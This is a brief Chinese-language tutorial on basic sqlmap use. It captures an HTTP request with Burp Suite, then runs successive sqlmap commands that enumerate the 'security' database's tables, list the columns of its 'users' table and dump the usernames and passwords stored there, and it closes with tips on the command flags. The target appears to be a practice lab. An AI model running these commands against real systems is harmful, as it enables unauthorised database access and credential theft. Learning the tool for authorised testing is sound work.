1. 程式人生 > >sqlmap 的簡單應用

sqlmap 的簡單應用

首先利用burpsuite 或者瀏覽器,擷取請求頭複製貼上為txt文件,然後再sqlmap下執行

sqlmap -r 18.txt

2、接下來爆出security 資料庫的所有表名

執行命令 sqlmap -r 18.txt -D security --tables

3、接下來爆出users表的所有欄位名

執行命令 sqlmap -r 18.txt -D security -T users --columns

4、接下來爆users表的所有資料項

執行命令 sqlmap -r 18.txt  -D security -T users -C password,username --dump

關於引數使用的小技巧:-D 資料庫開頭字母  -T  表開頭英文字母 -C 列開頭英文字母

引數為一個字母時通常一個 “-”  引數字母超過一個 通常有兩個橫線“- -”